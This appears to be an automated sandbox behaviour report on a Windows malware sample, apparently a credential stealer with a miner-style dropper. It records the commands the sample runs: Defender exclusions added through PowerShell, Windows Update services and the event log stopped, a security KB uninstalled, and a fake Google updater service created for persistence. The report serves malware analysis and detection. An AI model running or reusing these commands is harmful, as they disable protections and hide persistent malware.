                    Source: WGo3ga1AL9.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\ProgramData\GDBFCGIIIJ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2325677095.000000001AF69000.00000004.00000020.00020000.00000000.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2331971771.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2325677095.000000001AF69000.00000004.00000020.00020000.00000000.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2331971771.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2325677095.000000001AF69000.00000004.00000020.00020000.00000000.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2331971771.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2325677095.000000001AF69000.00000004.00000020.00020000.00000000.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2331971771.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: WGo3ga1AL9.exe, WGo3ga1AL9.exe, 00000000.00000002.2325677095.000000001AF69000.00000004.00000020.00020000.00000000.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2331971771.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2325677095.000000001AF69000.00000004.00000020.00020000.00000000.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2331971771.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2325677095.000000001AF69000.00000004.00000020.00020000.00000000.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2331971771.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: WGo3ga1AL9.exe, 00000000.00000003.1846702985.0000000020EEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2325677095.000000001AF69000.00000004.00000020.00020000.00000000.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2331971771.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2325677095.000000001AF69000.00000004.00000020.00020000.00000000.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2331971771.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                    Source: WGo3ga1AL9.exeReversingLabs: Detection: 39%
                    Source: unknownProcess created: C:\Users\user\Desktop\WGo3ga1AL9.exe "C:\Users\user\Desktop\WGo3ga1AL9.exe"
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2560 --field-trial-handle=2444,i,1816216943429670437,7438663567690844307,262144 /prefetch:8
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\GDBFCGIIIJ.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\GDBFCGIIIJ.exe "C:\ProgramData\GDBFCGIIIJ.exe"
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 7308 -ip 7308
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7308 -s 2296
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                    Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                    Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                    Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\ProgramData\Google\Chrome\updater.exe C:\ProgramData\Google\Chrome\updater.exe
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\GDBFCGIIIJ.exe"Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2560 --field-trial-handle=2444,i,1816216943429670437,7438663567690844307,262144 /prefetch:8Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\GDBFCGIIIJ.exe "C:\ProgramData\GDBFCGIIIJ.exe" Jump to behavior
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"Jump to behavior
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"Jump to behavior
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 7308 -ip 7308Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7308 -s 2296Jump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: mozglue.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: pcacli.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
